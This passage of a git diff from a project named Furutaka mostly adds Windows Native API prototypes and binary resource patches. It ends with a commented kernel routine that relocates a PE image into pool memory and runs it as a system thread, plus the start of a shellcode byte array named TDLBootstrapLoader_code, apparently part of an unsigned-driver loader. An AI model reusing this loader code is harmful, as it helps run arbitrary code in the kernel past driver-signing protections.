+NTSTATUS NTAPI RtlInitializeCriticalSectionAndSpinCount(
+ PRTL_CRITICAL_SECTION CriticalSection,
+ ULONG SpinCount
+ );
+
+ULONG NTAPI RtlSetCriticalSectionSpinCount(
+ PRTL_CRITICAL_SECTION CriticalSection,
+ ULONG SpinCount
+ );
+
+NTSTATUS NTAPI RtlDeleteCriticalSection(
+ PRTL_CRITICAL_SECTION CriticalSection
+ );
+
+/*
+** Critical Section END
+*/
+
+
+/*
+** Loader API START
+*/
+
+NTSTATUS NTAPI LdrGetProcedureAddress(
+ _In_ PVOID DllHandle,
+ _In_opt_ CONST ANSI_STRING* ProcedureName,
+ _In_opt_ ULONG ProcedureNumber,
+ _Out_ PVOID *ProcedureAddress
+ );
+
+/*
+** Loader API END
+*/
+
+/*
+** Native API START
+*/
+
+NTSTATUS NTAPI NtClose(
+ _In_ HANDLE Handle
+ );
+
+NTSTATUS NTAPI NtOpenDirectoryObject(
+ _Out_ PHANDLE DirectoryHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtQueryDirectoryObject(
+ _In_ HANDLE DirectoryHandle,
+ _Out_opt_ PVOID Buffer,
+ _In_ ULONG Length,
+ _In_ BOOLEAN ReturnSingleEntry,
+ _In_ BOOLEAN RestartScan,
+ _Inout_ PULONG Context,
+ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtQueryObject(
+ _In_opt_ HANDLE Handle,
+ _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
+ _Out_opt_ PVOID ObjectInformation,
+ _In_ ULONG ObjectInformationLength,
+ _Out_opt_ PULONG ReturnLength
+ );
+
+NTSTATUS WINAPI NtQuerySystemInformation(
+ _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
+ _Inout_ PVOID SystemInformation,
+ _In_ ULONG SystemInformationLength,
+ _Out_opt_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI
NtCreateMutant(
+ _Out_ PHANDLE MutantHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ BOOLEAN InitialOwner
+ );
+
+NTSTATUS NTAPI NtOpenMutant(
+ _Out_ PHANDLE MutantHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtQueryMutant(
+ _In_ HANDLE MutantHandle,
+ _In_ MUTANT_INFORMATION_CLASS MutantInformationClass,
+ _Out_ PVOID MutantInformation,
+ _In_ ULONG MutantInformationLength,
+ _Out_opt_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtReleaseMutant(
+ _In_ HANDLE MutantHandle,
+ _Out_opt_ PLONG PreviousCount
+ );
+
+NTSTATUS NTAPI NtCreateTimer(
+ _In_ PHANDLE TimerHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ TIMER_TYPE TimerType
+ );
+
+NTSTATUS NtSetTimer(
+ _In_ HANDLE TimerHandle,
+ _In_ PLARGE_INTEGER DueTime,
+ _In_opt_ PTIMER_APC_ROUTINE TimerApcRoutine,
+ _In_opt_ PVOID TimerContext,
+ _In_ BOOLEAN WakeTimer,
+ _In_opt_ LONG Period,
+ _Out_opt_ PBOOLEAN PreviousState
+ );
+
+NTSTATUS NTAPI NtOpenTimer(
+ _In_ PHANDLE TimerHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtQueryTimer(
+ _In_ HANDLE TimerHandle,
+ _In_ TIMER_INFORMATION_CLASS TimerInformationClass,
+ _Out_ PVOID TimerInformation,
+ _In_ ULONG TimerInformationLength,
+ _Out_opt_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtCreateSymbolicLinkObject(
+ _Out_ PHANDLE LinkHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ PUNICODE_STRING LinkTarget
+ );
+
+NTSTATUS WINAPI NtOpenSymbolicLinkObject(
+ _Out_ PHANDLE LinkHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtQuerySymbolicLinkObject(
+ _In_ HANDLE LinkHandle,
+ _Inout_ PUNICODE_STRING LinkTarget,
+ _Out_opt_ PULONG ReturnedLength
+ );
+
+NTSTATUS NTAPI NtQuerySemaphore(
+ _In_ HANDLE SemaphoreHandle,
+ _In_
SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,
+ _Out_ PVOID SemaphoreInformation,
+ _In_ ULONG SemaphoreInformationLength,
+ _Out_opt_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtQueryDirectoryFile(
+ _In_ HANDLE FileHandle,
+ _In_opt_ HANDLE Event,
+ _In_opt_ PIO_APC_ROUTINE ApcRoutine,
+ _In_opt_ PVOID ApcContext,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _Out_ PVOID FileInformation,
+ _In_ ULONG Length,
+ _In_ FILE_INFORMATION_CLASS FileInformationClass,
+ _In_ BOOLEAN ReturnSingleEntry,
+ _In_opt_ PUNICODE_STRING FileName,
+ _In_ BOOLEAN RestartScan
+ );
+
+NTSTATUS NTAPI NtQuerySection(
+ _In_ HANDLE SectionHandle,
+ _In_ SECTION_INFORMATION_CLASS SectionInformationClass,
+ _Out_ PVOID SectionInformation,
+ _In_ SIZE_T SectionInformationLength,
+ _Out_opt_ PSIZE_T ReturnLength
+ );
+
+NTSTATUS NtOpenSection(
+ _Out_ PHANDLE SectionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtCreateSection(
+ _Out_ PHANDLE SectionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_opt_ PLARGE_INTEGER MaximumSize,
+ _In_ ULONG SectionPageProtection,
+ _In_ ULONG AllocationAttributes,
+ _In_opt_ HANDLE FileHandle
+ );
+
+NTSTATUS NTAPI NtMapViewOfSection(
+ _In_ HANDLE SectionHandle,
+ _In_ HANDLE ProcessHandle,
+ __inout PVOID *BaseAddress,
+ _In_ ULONG_PTR ZeroBits,
+ _In_ SIZE_T CommitSize,
+ _Inout_opt_ PLARGE_INTEGER SectionOffset,
+ _Inout_ PSIZE_T ViewSize,
+ _In_ SECTION_INHERIT InheritDisposition,
+ _In_ ULONG AllocationType,
+ _In_ ULONG Win32Protect
+ );
+
+NTSTATUS NTAPI NtUnmapViewOfSection(
+ _In_ HANDLE ProcessHandle,
+ _In_ PVOID BaseAddress
+ );
+
+NTSTATUS NTAPI NtOpenProcessToken(
+ _In_ HANDLE ProcessHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE TokenHandle
+ );
+
+
+NTSTATUS NTAPI NtOpenThreadTokenEx(
+ _In_ HANDLE ThreadHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ BOOLEAN OpenAsSelf,
+ _In_ ULONG HandleAttributes,
+ _Out_
PHANDLE TokenHandle
+ );
+
+NTSTATUS NTAPI NtAdjustPrivilegesToken(
+ _In_ HANDLE TokenHandle,
+ _In_ BOOLEAN DisableAllPrivileges,
+ _In_opt_ PTOKEN_PRIVILEGES NewState,
+ _In_opt_ ULONG BufferLength,
+ _Out_opt_ PTOKEN_PRIVILEGES PreviousState,
+ _Out_opt_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtQueryInformationToken(
+ _In_ HANDLE TokenHandle,
+ _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
+ _Out_ PVOID TokenInformation,
+ _In_ ULONG TokenInformationLength,
+ _Out_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtOpenKey(
+ _Out_ PHANDLE KeyHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtQueryKey(
+ _In_ HANDLE KeyHandle,
+ _In_ KEY_INFORMATION_CLASS KeyInformationClass,
+ _Out_opt_ PVOID KeyInformation,
+ _In_ ULONG Length,
+ _Out_ PULONG ResultLength
+ );
+
+NTSTATUS NTAPI NtQueryValueKey(
+ _In_ HANDLE KeyHandle,
+ _In_ PUNICODE_STRING ValueName,
+ _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
+ _Out_ PVOID KeyValueInformation,
+ _In_ ULONG Length,
+ _Out_ PULONG ResultLength
+ );
+
+NTSTATUS NTAPI NtDeleteKey(
+ _In_ HANDLE KeyHandle
+ );
+
+NTSTATUS NTAPI NtDeleteValueKey(
+ _In_ HANDLE KeyHandle,
+ _In_ PUNICODE_STRING ValueName
+ );
+
+NTSTATUS NTAPI NtOpenJobObject(
+ _Out_ PHANDLE JobHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtQueryInformationJobObject(
+ _In_opt_ HANDLE JobHandle,
+ _In_ JOBOBJECTINFOCLASS JobObjectInformationClass,
+ _Out_ PVOID JobObjectInformation,
+ _In_ ULONG JobObjectInformationLength,
+ _Out_opt_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtOpenIoCompletion(
+ _Out_ PHANDLE IoCompletionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtQueryIoCompletion(
+ _In_ HANDLE IoCompletionHandle,
+ _In_ IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,
+ _Out_ PVOID IoCompletionInformation,
+ _In_ ULONG
IoCompletionInformationLength,
+ _Out_opt_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtQueryInformationFile(
+ _In_ HANDLE FileHandle,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _Out_ PVOID FileInformation,
+ _In_ ULONG Length,
+ _In_ FILE_INFORMATION_CLASS FileInformationClass
+ );
+
+NTSTATUS NTAPI NtFsControlFile(
+ _In_ HANDLE FileHandle,
+ _In_opt_ HANDLE Event,
+ _In_opt_ PIO_APC_ROUTINE ApcRoutine,
+ _In_opt_ PVOID ApcContext,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _In_ ULONG FsControlCode,
+ _In_ PVOID InputBuffer,
+ _In_ ULONG InputBufferLength,
+ _Out_ PVOID OutputBuffer,
+ _In_ ULONG OutputBufferLength
+ );
+
+NTSTATUS NTAPI NtQueryDirectoryFile(
+ _In_ HANDLE FileHandle,
+ _In_opt_ HANDLE Event,
+ _In_opt_ PIO_APC_ROUTINE ApcRoutine,
+ _In_opt_ PVOID ApcContext,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _Out_ PVOID FileInformation,
+ _In_ ULONG Length,
+ _In_ FILE_INFORMATION_CLASS FileInformationClass,
+ _In_ BOOLEAN ReturnSingleEntry,
+ _In_opt_ PUNICODE_STRING FileName,
+ _In_ BOOLEAN RestartScan
+ );
+
+NTSTATUS NTAPI NtQueryEaFile(
+ _In_ HANDLE FileHandle,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ __out_bcount(Length) PVOID Buffer,
+ _In_ ULONG Length,
+ _In_ BOOLEAN ReturnSingleEntry,
+ __in_bcount_opt(EaListLength) PVOID EaList,
+ _In_ ULONG EaListLength,
+ _In_opt_ PULONG EaIndex,
+ _In_ BOOLEAN RestartScan
+ );
+
+NTSTATUS NTAPI NtSetEaFile(
+ _In_ HANDLE FileHandle,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ __in_bcount(Length) PVOID Buffer,
+ _In_ ULONG Length
+ );
+
+NTSTATUS NTAPI NtQueryVolumeInformationFile(
+ _In_ HANDLE FileHandle,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _Out_ PVOID FsInformation,
+ _In_ ULONG Length,
+ _In_ FS_INFORMATION_CLASS FsInformationClass
+ );
+
+NTSTATUS NTAPI NtOpenFile(
+ _Out_ PHANDLE FileHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _In_ ULONG ShareAccess,
+ _In_ ULONG OpenOptions
+ );
+
+NTSTATUS NTAPI NtReadFile(
+
_In_ HANDLE FileHandle, + _In_opt_ HANDLE Event, + _In_opt_ PIO_APC_ROUTINE ApcRoutine, + _In_opt_ PVOID ApcContext, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + __out_bcount(Length) PVOID Buffer, + _In_ ULONG Length, + _In_opt_ PLARGE_INTEGER ByteOffset, + _In_opt_ PULONG Key + ); + +NTSTATUS NTAPI NtWriteFile( + _In_ HANDLE FileHandle, + _In_opt_ HANDLE Event, + _In_opt_ PIO_APC_ROUTINE ApcRoutine, + _In_opt_ PVOID ApcContext, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_ PVOID Buffer, + _In_ ULONG Length, + _In_opt_ PLARGE_INTEGER ByteOffset, + _In_opt_ PULONG Key + ); + +NTSTATUS NTAPI NtFlushBuffersFile( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock + ); + +NTSTATUS NTAPI NtSetInformationFile( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + __in_bcount(Length) PVOID FileInformation, + _In_ ULONG Length, + _In_ FILE_INFORMATION_CLASS FileInformationClass + ); + +NTSTATUS NTAPI NtDeleteFile( + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtOpenEvent( + _Out_ PHANDLE EventHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtOpenKeyedEvent( + _Out_ PHANDLE KeyedEventHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtOpenSemaphore( + _Out_ PHANDLE SemaphoreHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtQueryEvent( + _In_ HANDLE EventHandle, + _In_ EVENT_INFORMATION_CLASS EventInformationClass, + _Out_ PVOID EventInformation, + _In_ ULONG EventInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtOpenEventPair( + _Out_ PHANDLE EventPairHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +//TmTx +NTSTATUS NTAPI NtCreateTransaction( + _Out_ PHANDLE TransactionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ LPGUID Uow, + 
_In_opt_ HANDLE TmHandle, + _In_opt_ ULONG CreateOptions, + _In_opt_ ULONG IsolationLevel, + _In_opt_ ULONG IsolationFlags, + _In_opt_ PLARGE_INTEGER Timeout, + _In_opt_ PUNICODE_STRING Description + ); + +//TmRm +NTSTATUS NTAPINtCreateResourceManager( + _Out_ PHANDLE ResourceManagerHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ HANDLE TmHandle, + _In_opt_ LPGUID ResourceManagerGuid, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ ULONG CreateOptions, + _In_opt_ PUNICODE_STRING Description + ); + +//TmEn +NTSTATUS NTAPI NtCreateEnlistment( + _Out_ PHANDLE EnlistmentHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ HANDLE ResourceManagerHandle, + _In_ HANDLE TransactionHandle, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ ULONG CreateOptions, + _In_ NOTIFICATION_MASK NotificationMask, + _In_opt_ PVOID EnlistmentKey + ); + +//TmTm +NTSTATUS NTAPI NtCreateTransactionManager( + _Out_ PHANDLE TmHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PUNICODE_STRING LogFileName, + _In_opt_ ULONG CreateOptions, + _In_opt_ ULONG CommitStrength + ); + +NTSTATUS NTAPI NtCreateFile( + _Out_ PHANDLE FileHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_opt_ PLARGE_INTEGER AllocationSize, + _In_ ULONG FileAttributes, + _In_ ULONG ShareAccess, + _In_ ULONG CreateDisposition, + _In_ ULONG CreateOptions, + _In_opt_ PVOID EaBuffer, + _In_ ULONG EaLength + ); + +NTSTATUS NTAPI NtOpenProcess( + _Out_ PHANDLE ProcessHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PCLIENT_ID ClientId + ); + +NTSTATUS NTAPI NtTerminateProcess( + _In_opt_ HANDLE ProcessHandle, + _In_ NTSTATUS ExitStatus + ); + +NTSTATUS NTAPI NtSuspendThread( + _In_ HANDLE ThreadHandle, + _Out_opt_ PULONG PreviousSuspendCount + ); + +NTSTATUS NTAPI NtResumeThread( + _In_ HANDLE ThreadHandle, + _Out_opt_ PULONG 
PreviousSuspendCount + ); + +NTSTATUS NTAPI NtOpenThread( + _Out_ PHANDLE ThreadHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PCLIENT_ID ClientId + ); + +NTSTATUS NTAPI NtImpersonateThread( + _In_ HANDLE ServerThreadHandle, + _In_ HANDLE ClientThreadHandle, + _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos + ); + +NTSTATUS NTAPI NtSetContextThread( + _In_ HANDLE ThreadHandle, + _In_ PCONTEXT ThreadContext + ); + +NTSTATUS NTAPI NtGetContextThread( + _In_ HANDLE ThreadHandle, + _Inout_ PCONTEXT ThreadContext + ); + +NTSTATUS NTAPI NtQueryInformationProcess( + _In_ HANDLE ProcessHandle, + _In_ PROCESSINFOCLASS ProcessInformationClass, + _Out_ PVOID ProcessInformation, + _In_ ULONG ProcessInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtDuplicateObject( + _In_ HANDLE SourceProcessHandle, + _In_ HANDLE SourceHandle, + _In_opt_ HANDLE TargetProcessHandle, + _Out_ PHANDLE TargetHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ ULONG HandleAttributes, + _In_ ULONG Options + ); + +NTSTATUS NTAPI NtSetSecurityObject( + _In_ HANDLE Handle, + _In_ SECURITY_INFORMATION SecurityInformation, + _In_ PSECURITY_DESCRIPTOR SecurityDescriptor + ); + +NTSTATUS NTAPI NtQuerySecurityObject( + _In_ HANDLE Handle, + _In_ SECURITY_INFORMATION SecurityInformation, + _Out_ PSECURITY_DESCRIPTOR SecurityDescriptor, + _In_ ULONG Length, + _Out_ PULONG LengthNeeded + ); + +NTSTATUS NtCreateIoCompletion( + _Out_ PHANDLE IoCompletionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ ULONG Count + ); + +NTSTATUS NTAPI NtCreateEvent( + _Out_ PHANDLE EventHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ EVENT_TYPE EventType, + _In_ BOOLEAN InitialState + ); + +NTSTATUS NTAPI NtAllocateVirtualMemory( + _In_ HANDLE ProcessHandle, + _Inout_ PVOID *BaseAddress, + _In_ ULONG_PTR ZeroBits, + _Inout_ PSIZE_T RegionSize, + _In_ ULONG 
AllocationType, + _In_ ULONG Protect + ); + +NTSTATUS NTAPI NtFreeVirtualMemory( + _In_ HANDLE ProcessHandle, + _Inout_ PVOID *BaseAddress, + _Inout_ PSIZE_T RegionSize, + _In_ ULONG FreeType + ); + +NTSTATUS NTAPI NtQueryVirtualMemory( + _In_ HANDLE ProcessHandle, + _In_ PVOID BaseAddress, + _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass, + _Out_ PVOID MemoryInformation, + _In_ SIZE_T MemoryInformationLength, + _Out_opt_ PSIZE_T ReturnLength + ); + +NTSTATUS NTAPI NtReadVirtualMemory( + _In_ HANDLE ProcessHandle, + _In_opt_ PVOID BaseAddress, + _Out_ PVOID Buffer, + _In_ SIZE_T BufferSize, + _Out_opt_ PSIZE_T NumberOfBytesRead + ); + +NTSTATUS NTAPI NtWriteVirtualMemory( + _In_ HANDLE ProcessHandle, + _In_opt_ PVOID BaseAddress, + _In_ VOID *Buffer, + _In_ SIZE_T BufferSize, + _Out_opt_ PSIZE_T NumberOfBytesWritten + ); + +NTSTATUS NTAPI NtProtectVirtualMemory( + _In_ HANDLE ProcessHandle, + _Inout_ PVOID *BaseAddress, + _Inout_ PSIZE_T RegionSize, + _In_ ULONG NewProtect, + _Out_ PULONG OldProtect + ); + +NTSTATUS NTAPI NtEnumerateKey( + _In_ HANDLE KeyHandle, + _In_ ULONG Index, + _In_ KEY_INFORMATION_CLASS KeyInformationClass, + _Out_opt_ PVOID KeyInformation, + _In_ ULONG Length, + _Out_ PULONG ResultLength + ); + +NTSTATUS NTAPI NtCreatePort( + _Out_ PHANDLE PortHandle, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ ULONG MaxConnectionInfoLength, + _In_ ULONG MaxMessageLength, + _In_ ULONG MaxPoolUsage + ); + +NTSTATUS NTAPI NtCompleteConnectPort( + _In_ HANDLE PortHandle + ); + +NTSTATUS NTAPI NtListenPort( + _In_ HANDLE PortHandle, + _Out_ PPORT_MESSAGE ConnectionRequest + ); + +NTSTATUS NTAPI NtReplyPort( + _In_ HANDLE PortHandle, + _In_ PPORT_MESSAGE ReplyMessage + ); + +NTSTATUS NTAPI NtReplyWaitReplyPort( + _In_ HANDLE PortHandle, + _Inout_ PPORT_MESSAGE ReplyMessage + ); + +NTSTATUS NTAPI NtRequestPort( + _In_ HANDLE PortHandle, + _In_ PPORT_MESSAGE RequestMessage + ); + +NTSTATUS NTAPI NtRequestWaitReplyPort( + _In_ HANDLE PortHandle, + _In_ 
PPORT_MESSAGE RequestMessage, + _Out_ PPORT_MESSAGE ReplyMessage + ); + +NTSTATUS NTAPI NtClosePort( + _In_ HANDLE PortHandle + ); + +NTSTATUS NTAPI NtReplyWaitReceivePort( + _In_ HANDLE PortHandle, + _Out_opt_ PVOID *PortContext, + _In_opt_ PPORT_MESSAGE ReplyMessage, + _Out_ PPORT_MESSAGE ReceiveMessage + ); + +NTSTATUS NTAPI NtWriteRequestData( + _In_ HANDLE PortHandle, + _In_ PPORT_MESSAGE Message, + _In_ ULONG DataEntryIndex, + _In_ PVOID Buffer, + _In_ ULONG BufferSize, + _Out_opt_ PULONG NumberOfBytesWritten + ); + +NTSTATUS NTAPI NtReadRequestData( + _In_ HANDLE PortHandle, + _In_ PPORT_MESSAGE Message, + _In_ ULONG DataEntryIndex, + _Out_ PVOID Buffer, + _In_ ULONG BufferSize, + _Out_opt_ PULONG NumberOfBytesRead + ); + +NTSTATUS NTAPI NtConnectPort( + _Out_ PHANDLE PortHandle, + _In_ PUNICODE_STRING PortName, + _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos, + _Inout_opt_ PPORT_VIEW ClientView, + _Out_opt_ PREMOTE_PORT_VIEW ServerView, + _Out_opt_ PULONG MaxMessageLength, + _Inout_opt_ PVOID ConnectionInformation, + _Inout_opt_ PULONG ConnectionInformationLength + ); + +NTSTATUS NTAPI NtAcceptConnectPort( + _Out_ PHANDLE PortHandle, + _In_opt_ PVOID PortContext, + _In_ PPORT_MESSAGE ConnectionRequest, + _In_ BOOLEAN AcceptConnection, + _Inout_opt_ PPORT_VIEW ServerView, + _Out_opt_ PREMOTE_PORT_VIEW ClientView + ); diff --git a/Source/Furutaka/resource.h b/Source/Furutaka/resource.h new file mode 100644 index 0000000000000000000000000000000000000000..45563148ac5ac8b8509a3a29aff0b89cdbb70e2b GIT binary patch literal 900 zcmb7@-D<)>5QWcmq3^KZWuaEu7qBK5QjHRSXs@J3Q!Jv8nEp`u>TSQ-Xwf3UGHiC{ zFni|A4Eg@5tF8|$Qcn{F3f1RC-iy>yn`od<>|AH$*5%aILWwf1m2*;Uz{X&?3O#B` z)Y1j!^rX2~oD6)!Jp)^SBxDstbK(?aiFdhIVFXv1J=Hro8Ijd0@DiVE_fC=BHP2>T zR?ne3P)tWLS^_mS(L zNC*GetR~yq6W)ZnM}y7H_TEE{O)vx*lhq*(>FUrLy3+N@%q>{ESd(f&C9l&B%x2{_ q{_gmgZex$=Aol%MsdljbkGq_t?V_63reoYY)%Fj}{I1LCAI3lM>V1;{ literal 0 HcmV?d00001 
diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc new file mode 100644 index 0000000000000000000000000000000000000000..b664ad48057455329fd15ddf7ac662ce8eb3e77a GIT binary patch literal 4978 zcmd6r+iu%95QgWvz`ld(+_cy>vD>2ej$<3aI&lym&;kJrr*YC?vvJ@`V;s(x4ApyrbfJ%|3oe@& zUxU)z{z3m0=m>`)T7Tg87_D3ADLmTH-_SNK@@pG>b@=*yS^TSqSdhqj#~Q5UN!RGT zn{Nc<1K(=(LAnS(UlUnNEHy>v$X;Y9FAMCxOhwVHL+E)Xny%o{v<`mcqi8_HjNsbB zlP366k4JpJ^F*aPhwwPZYsF(kyuEa%_Mo0Z9np84X9h}GH^6tb<`ujLtUKg1zei`c zk*f){hmQ*bZ*6H&Zf(WF7#;p%_mSICEnB9g33d&ASwx5T>eU*cRTlete~9i~mlZUN z;-@&vURXWOv~7^{h-sH{$S!9TW%rupb4$%G$Wa$~vCs2~lw}gV-BF@#&)IXi_lg)( zKJkyNR+L-v-X`qS(sr)aI7ky;X(XV4+(yn_;JWWSwtBV==c76z(wo}%0o-iCgR9aYZ=gBo(H?s;%`-Z%Vf%4`N*w?@rbF@icrCsjtp=N5Ag z+8@C$U9tK|2qz3(U3v7h zs@gZPO3S;?x<}eJc=cF+<2cJE5BANWaRcfr_;`Ed->6P$xhmofdNuHq$X?U@>^-A4 z{yw1wspF3w$LGXRR8{r(WJf+GM1Bt5&UBH!V$&F7&GFTV$3dzTSM2J?L@Fn{!uLCu>vz zmOW`+Woy#(8a}%qqh0WPu}ggTF{VshhIqg-bL^tnxMVydI+jHKGR_>5v%F^7^@}Bq zSGC5$E}{3e#m~M#^HpNCG)hY&tuzn)|NSpQRr}BXiwHQTrKr|e5|(@TJ<*|m%kuv` Je_lfanew); + + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + + ULONG isz = popth->SizeOfImage; + HANDLE th; + + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; + + OBJECT_ATTRIBUTES attr; + + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); + + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; + + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); + + while (p < rel->SizeOfBlock) { + + switch (*chains >> 
12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } + + chains++; + p += sizeof(WORD); + } + + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } + + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + + InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); + PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); +} +*/ +static const unsigned char TDLBootstrapLoader_code[415] = { + 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, + 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, + 0xFF, 0xFF, 0x48, 0x81, 0xC3, 